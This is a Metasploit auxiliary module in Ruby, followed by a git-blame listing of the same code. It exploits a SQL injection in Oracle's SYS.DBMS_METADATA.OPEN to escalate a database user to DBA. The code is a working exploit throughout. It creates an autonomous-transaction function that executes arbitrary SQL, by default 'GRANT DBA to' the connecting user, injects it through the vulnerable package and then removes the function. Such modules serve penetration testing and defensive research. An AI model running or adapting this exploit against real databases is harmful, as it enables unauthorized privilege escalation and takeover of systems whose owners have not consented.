metasploit-framework/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',
      'Description'    => %q{
        This module will escalate a Oracle DB user to DBA by exploiting an sql injection
        bug in the SYS.DBMS_METADATA.OPEN package/function.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.metasploit.com' ],
        ],
      'DisclosureDate' => 'Jan 5 2008'))

      register_options(
        [
          OptString.new('SQL', [ false, 'SQL to execute.',  "GRANT DBA to #{datastore['DBUSER']}"]),
        ])
  end

  def run
    return if not check_dependencies

    name = Rex::Text.rand_text_alpha(rand(10) + 1)

    function = "
      create or replace function #{datastore['DBUSER']}.#{name} return varchar2
      authid current_user is pragma autonomous_transaction;
      begin
      execute immediate '#{datastore['SQL']}';
      return '';
      end;
      "

    package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual"

    clean = "drop function #{name}"


    print_status("Sending function...")
    prepare_exec(function)

    begin
      print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")
      prepare_exec(package)
    rescue ::OCIError => e
      if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )
        print_status("Removing function '#{name}'...")
        prepare_exec(clean)
      else
      end
    end
  end
end
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::ORACLE`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',`
			`'Description' => %q{`
			`This module will escalate a Oracle DB user to DBA by exploiting an sql injection`
			`bug in the SYS.DBMS_METADATA.OPEN package/function.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.metasploit.com' ],`
			`],`
			`'DisclosureDate' => 'Jan 5 2008'))`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run`
			`return if not check_dependencies`
i'm tired of support requests for oci libs not being installed git-svn-id: file:///home/svn/framework3/trunk@8899 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-24 19:02:38 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`name = Rex::Text.rand_text_alpha(rand(10) + 1)`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`function = "`
			`create or replace function #{datastore['DBUSER']}.#{name} return varchar2`
			`authid current_user is pragma autonomous_transaction;`
			`begin`
			`execute immediate '#{datastore['SQL']}';`
			`return '';`
			`end;`
			`"`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`package = "select sys.dbms_metadata.open('''\|\|#{datastore['DBUSER']}.#{name}()\|\|''') from dual"`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`clean = "drop function #{name}"`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00
updated oracle mixin and adjusted affected modules. now compatible with ruby 1.8 and 1.9 git-svn-id: file:///home/svn/framework3/trunk@7688 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-03 23:57:02 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Sending function...")`
			`prepare_exec(function)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`begin`
			`print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")`
			`prepare_exec(package)`
			`rescue ::OCIError => e`
			`if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )`
			`print_status("Removing function '#{name}'...")`
			`prepare_exec(clean)`
			`else`
			`end`
			`end`
			`end`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`end`